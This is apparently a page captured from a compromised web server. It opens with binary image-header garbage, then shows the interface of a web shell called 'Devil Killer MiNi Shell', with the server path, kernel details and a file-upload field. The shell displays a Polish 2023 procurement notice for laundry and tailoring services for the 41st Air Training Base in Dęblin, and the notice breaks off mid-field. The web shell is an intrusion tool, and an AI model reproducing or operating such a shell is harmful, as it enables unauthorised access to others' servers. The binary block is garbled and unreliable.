JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230221/0010329001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sukcesywne wykonywanie usług pralniczych przedmiotów umundurowania i wyekwipowania na rzecz 41 Bazy Lotnictwa Szkolnego w Dęblinie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">41. Baza Lotnictwa Szkolnego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 061456920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brygady Pościgowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dęblin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-521</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261518173</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">41blsz.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.41blsz.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne wykonywanie usług pralniczych przedmiotów umundurowania i wyekwipowania na rzecz 41 Bazy Lotnictwa Szkolnego w Dęblinie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ae6ffaba-b1b3-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00103290</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00012131/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 USŁUGI PRALNICZE</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/41blsz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji<br/>elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002r o świadczeniu usług drogą elektroniczną (tj. Dz. U. z 2020r, poz. 344) za<br/>pośrednictwem Platformy Zakupowej pod adresem: https://portal.smartpzp.pl/41blsz<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń za pomocą poczty elektronicznej, na adres e-mail: 41blsz.przetargi@ron.mil.pl, z zastrzeżeniem, że<br/>oferta musi wpłynąć na wskazaną powyżej Platformę Zakupową, a nie na wskazaną pocztę elektroniczną!<br/>Zamawiający informuje, że poczta elektroniczna nie jest środkiem komunikacji do złożenia oferty, ponieważ istnieje obowiązek jej<br/>zaszyfrowania i uniemożliwienia otwarcia przez wyznaczonym terminem otwarcia ofert.<br/>Szczegółowo informacje dot. komunikacji zostały opisane w Rozdziale IX SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) - określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na Platformie Zakupowej, tj.:<br/> posiadanie komputera o parametrach umożliwiających zainstalowanie następującego oprogramowania:<br/>• w zakresie podstawowych funkcjonalności – przegląd, pobieranie i załączanie dokumentów:<br/>a) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z<br/>systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - Lub ich nowsze wersje<br/>b) przeglądarka internetowa Mozilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera w ver. 58 i<br/>późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11,<br/>c) Lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji<br/>przeglądarek<br/>• w zakresie składania podpisu kwalifikowanego (za pośrednictwem platformy SmartPZP):<br/>a) zainstalowane środowisko Java w wersji min. 1.8 (jre)<br/>b) w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web<br/>c) oprogramowania SzafirHost w systemie operacyjnym.<br/>Proces składania oferty lub wniosku przez Wykonawcę na platformie SmartPZP odbywa się w ciągu jednej sesji przeglądarki! Nie<br/>można zapisać wprowadzonych danych lub załączników i powrócić do składania oferty lub wniosku w późniejszym terminie.<br/>Instrukcja instalowania oprogramowania wskazanego w punktach a, b i c powyżej znajduje się w Systemie w zakładce E-learning.<br/>12. Użycie przez Wykonawcę do kontaktu z Zamawiającym środków komunikacji elektronicznej zapewnionych w Systemie jest<br/>uzależnione od uprzedniej akceptacji przez Wykonawcę Regulaminu korzystania z usług Systemu na witrynie internetowej przy<br/>zakładaniu profilu Wykonawcy.<br/>13. Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem Systemu wynosi 100 MB. Za pośrednictwem<br/>Systemu można przesłać wiele pojedynczych plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych<br/>plików.<br/>14. Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach .png, .jpg, .jpeg, .gif, .doc, .docx, .xls,<br/>.xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .txt, .ath, .xml, .dwg, .xades, .tar, .7z, .eml, .msg<br/>15. Za pośrednictwem posiadanego w Systemie konta Użytkownika Zewnętrznego tj. użytkownika Wykonawcy odbywa się<br/>komunikacja Wykonawcy z Zamawiającym w postępowaniu, w szczególności: przekazywanie dokumentów, wezwań i zawiadomień,<br/>oświadczeń, informacji, pytań, wniosków w ramach postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, zamawiający informuje, że:<br/>administratorem Pani/Pana danych osobowych jest:<br/>Ogłoszenie nr 2023/BZP 00044229/01 z dnia 2023-01-19<br/>2023-01-19 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>41. Baza Lotnictwa Szkolnego w Dęblinie<br/>ul. Brygady Pościgowej 5<br/>08 – 521 Dęblin,<br/>NIP: 506-011-18-75, REGON: 061456920,<br/>kontakt: tel. 261 517 525, e-mail: 41blsz.przetargi@ron.mil.pl<br/>a) kontakt do Inspektora ochrony danych osobowych Zamawiającego: tel. 261 518 821, e-mail: 41blsz.iod@ron.mil.pl ;<br/>b) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn.: „Sukcesywne wykonywanie usług pralniczych przedmiotów umundurowania i<br/>wyekwipowania na rzecz 41 Bazy Lotnictwa Szkolnego w Dęblinie” SPRAWA 2/23/P, prowadzonym w trybie podstawowym bez<br/>możliwości negocjacji, o wartości szacunkowej zamówienia poniżej progów unijnych w związku z art. 275 ust. 1 ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych (dalej „Pzp”);<br/>c) w odniesieniu do danych osobowych osób fizycznych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do<br/>art. 22 RODO;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy Pzp; Na podstawie art. 74 ust. 3 ustawy Pzp – w przypadku gdy wniesienie żądania<br/>dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych<br/>osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o<br/>udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2<br/>rozporządzenia 2016/679.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez<br/>zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, zamawiający może żądać od osoby<br/>występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia. Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do<br/>sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać<br/>integralności protokołu postępowania oraz jego załączników.<br/>e) Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia; a<br/>jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>g) posiada Pani/Pan:<br/> na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/> na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*,<br/> skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani<br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">13/23/P</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Sukcesywne wykonywanie usług pralniczych przedmiotów umundurowania i<br/>wyekwipowania na rzecz 41 Bazy Lotnictwa Szkolnego w Dęblinie”, zgodnie z parametrami jakościowymi zawartymi w<br/>Załączniku nr 1 (Formularz ofertowy) oraz 1a (Szczegółowy Opis Przedmiotu zamówienia).<br/>Szczegółowy opis przedmiotu zamówienia oraz wymagania jakościowe znajdują się poniżej oraz w załącznikach do SWZ:<br/>a) Załącznik nr 1 do SWZ tj. Formularz ofertowy;<br/>b) Załącznik nr 1 a do SWZ tj. Opis przedmiotu zamówienia;<br/>c) Załącznik nr 1b do SWZ tj. Zestawienie wag przedmiotów zaopatrzenia mundurowego i określenie rodzajów prania;<br/>d) Załącznik nr 6 do SWZ- Projektowane postanowienia umowy<br/>Wymagania dotyczące realizacji umowy, usług i gwarancji oraz kar umownych zawarte są w Załączniku nr 6 do SWZ Projektowane<br/>postanowienia umowy.<br/><br/>Szczegółowy opis przedmiotu zamówienia<br/><br/>1)	Pranie wodne z maglowaniem lub prasowaniem: 15 000,00 kg- zamówienie podstawowe, w ramach prawa opcji 12 000,00 kg.<br/>	pranie wodne bielizny pościelowej, osobistej i stołowej: wykaz przedmiotów zgodnie z zał. 1b;<br/>	wykonanie drobnych napraw krawieckich (np. przyszywanie guzików, zszycie rozdarć, cerowanie, obszycie poszarpanych brzegów, wciąganie gumek lub sznurków np.) przed zwrotem do magazynu wymiennego;<br/>	PUiW wymagające maglowania określono w zał. nr 1b,<br/>	PUiW wymagające prasowanie określono w zał. nr 1b, <br/>	pozostałe zgodnie z technologią w zależności od wskazań określonych przez producenta na wszywce (metce) danego PUiW;<br/>	składanie i pakowanie po maglowaniu i prasowaniu według asortymentu w worek ( np. foliowy) po 10-20 szt. PUiW w paczce;<br/>	płukanie ręczników frotte w płynie zmiękczającym;<br/>2)	Pranie chemiczne z prasowaniem : 5 000,00 kg- zamówienie podstawowe, zamówienie w ramach prawa opcji 4000,00kg.<br/><br/>	pranie chemiczne umundurowania polowego, wyjściowego i historycznego, zagłówków;<br/>	odkażanie i usuwanie plam;<br/>	wykonanie drobnych napraw krawieckich (np. przyszywanie guzików, zszycie rozdarć, cerowanie, obszycie poszarpanych brzegów, wciąganie gumek lub sznurków np.) przed zwrotem do magazynu wymiennego;<br/>	maglowanie, prasowanie w zależności od asortymentu;<br/>	składanie i pakowanie po maglowaniu lub prasowaniu według asortymentu w worek ( np. foliowy uniemożliwiający zbrudzenie) po 10-20 szt. PUiW w paczce;<br/>3)	Usługi krawieckie, drobne poprawki krawieckie – 500 n/min- zamówienie podstawowe, zamówienie w ramach prawa opcji 400 n/min. <br/><br/>	wykonywanie drobnych poprawek krawieckich w zakresie cerowania, zszywania, przyszywania guzików, skracania spodni, skracania rękawów bluz mundurów, zwężania spodni i bluz mundurów polowych i wyjściowych galowych.<br/>	materiały do wykonania napraw zabezpiecza wykonawca.<br/>4)	Dezynfekcja obuwia : 500 par- zamówienie podstawowe, zamówienie w ramach prawa opcji 400 par. <br/>	odkażanie i dezynfekcja obuwia ( trzewiki – 500 par)<br/>	materiały, środki do wykonania odkażania, dezynfekcji zabezpiecza wykonawca. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98310000-9 - Usługi prania i czyszczenia na sucho</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50821000-6 - Usługi w zakresie naprawy butów</p> <p class="mb-0">50830000-2 - Usługi w zakresie naprawy odzieży i wyrobów włókienniczych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zgodnie z art. 441 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych Zamawiający przewiduje możliwość skorzystania z prawa opcji polegającego na możliwości zwiększenia podstawowego zakresu ilościowego przedmiotu zamówienia określonego co do asortymentu i ilości w tabeli Nr 1 – kolumna „zakres podstawowy” (gwarantowany Wykonawcy), maksymalnie o ilości wykazane w tabeli Nr 1 kolumna „ZAKRES PRAWA OPCJI” (do 80% ilości w ramach zamówienia podstawowego). Prawo opcji oznacza, iż Zamawiający na pewno wykorzysta ilość gwarantowaną, natomiast realizacja usług opcjonalnych może nastąpić tylko i wyłącznie za zgodą Zamawiającego, w ilościach przez niego wskazanych, po cenach jednostkowych takich jak w przypadku zamówienia podstawowego, w terminie realizacji (obowiązywania) umowy. <br/><br/>Zamawiający przewiduje możliwość skorzystania z prawa opcji określonego w art. 441 ustawy Pzp (prawo opcji) w postaci zwiększenia ilości zamówienia podstawowego maksymalnie do 80 % wartości zamówienia podstawowego. <br/>1)	Skorzystanie przez Zamawiającego z prawa opcji będzie miało zastosowanie w ramach zawartej umowy, według cen jednostkowych określonych w umowie w sytuacji konieczności zapewnienia bieżących potrzeb Zamawiającego. <br/>2)	Uruchomienie zamówienia w ramach prawa opcji nastąpi poprzez skierowanie do Wykonawcy „zamówienia opcjonalnego”. Przedmiot zamówienia zakupiony w ramach prawa opcji musi spełniać wszystkie wymogi jak dla zamówienia podstawowego. O uruchomieniu prawa opcji Zamawiający powiadomi Wykonawcę na piśmie z co najmniej 7 dniowym wyprzedzeniem. <br/><br/>Uruchomienie prawa opcji nastąpi po wyczerpaniu wartości brutto umowy objętej zamówieniem podstawowym. <br/><br/>3)	Skorzystanie przez Zamawiającego z prawa opcji będzie miało zastosowanie <br/>w ramach zawartej umowy według cen jednostkowych zadeklarowanych przez Wykonawcę w Formularzu ofertowym – załączniku nr 1 do SWZ, zgodnych <br/>z cenami dla zamówienia podstawowego. <br/>4)	Zamawiający o zamiarze skorzystania z prawa opcji, jego zakresie i terminach usług opcjonalnych powiadomi Wykonawcę w formie pisemnej. W takim przypadku Zamawiający złoży na piśmie z co najmniej 7 dniowym wyprzedzeniem informację dotyczącą uruchomienia prawa opcji. Przedmiot zamówienia zakupiony w ramach prawa opcji musi spełniać wszystkie wymogi tak jak przedmiot zamówienia objęty zamówieniem podstawowym <br/>5)	Skorzystanie z prawa opcji może nastąpić wyłącznie w przypadku przydzielenia środków finansowych na realizację zadań stanowiących przedmiot zamówienia (umowy) i w konsekwencji pokrycia w planie finansowym Zamawiającego w określonym opcją zakresie. <br/>6)	Zamawiający zastrzega, iż część zamówienia określona jako „prawo opcji” jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Zamawiający może nie skorzystać z prawa opcji, w szczególności w przypadku nieuzyskania środków finansowych na ten cel, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia. <br/>7)	Zamawiający może z prawa opcji korzystać wielokrotnie, do wyczerpania maksymalnej ilości określonej w tabeli nr 1 w pozycjach nr 1/2/3/4 (kol. 5) w całym okresie obowiązywania umowy. <br/>8)	Skorzystanie przez Zamawiającego z prawa opcji będzie miało zastosowanie <br/>w ramach zawartej umowy według cen jednostkowych zadeklarowanych przez Wykonawcę w Formularzu ofertowym – załączniku nr 1 do umowy, zgodnych <br/>z cenami dla zamówienia podstawowego i na warunkach jak dla zamówienia podstawowego. <br/>9)	Ostateczna ilość zrealizowanych w ramach prawa opcji usług pralniczych będzie uzależniona od bieżących potrzeb Zamawiającego i posiadanych przez niego środków finansowych. <br/>10)	Realizacja prawa opcji polegać będzie na zwiększeniu podstawowego zakresu ilościowego przedmiotu zamówienia określonego co do rodzaju usługi w tabeli nr 1 pozycje 1/2/3/4 w kol. 4 o ilości wynikające z uzasadnionych bieżących potrzeb Zamawiającego, o ilości maksymalnie określone w tabeli nr 1 w pozycjach nr 1/2/3/4 w kol. 5 (wielkości orientacyjne). <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert ważnych i wyborze najkorzystniejszej oferty Zamawiający będzie się kierował<br/>następującym kryteriami i ich znaczeniem (wagą)<br/>Cena brutto oferty – waga 100 %<br/>Zamawiający ofercie o najniższej cenie przyzna 100 punktów, a każdej następnej zostanie przyporządkowana liczba punktów<br/>proporcjonalnie mniejsza, według wzoru:<br/>X - cena brutto oferty – waga 100%<br/>X = (Cn : Cof) x 100 x 100% (ilość punktów)<br/>Gdzie:<br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższe całkowite wynagrodzenie brutto wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 14 Tabeli<br/>Nr 1 Formularza ofertowego (obejmujące zarówno usługi realizowane w ramach zamówienia podstawowego jak i zamówienia<br/>realizowane w ramach prawa opcji) - spośród ocenianych ofert<br/>Cb – całkowite wynagrodzenie brutto wynikające z Formularza ofertowego, Załącznika Nr 1 do SWZ - kolumna nr 14 (obejmujące<br/>zarówno usługi realizowane w ramach zamówienia podstawowego jak i zamówienia realizowane w ramach prawa opcji) - oferty<br/>ocenianej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) 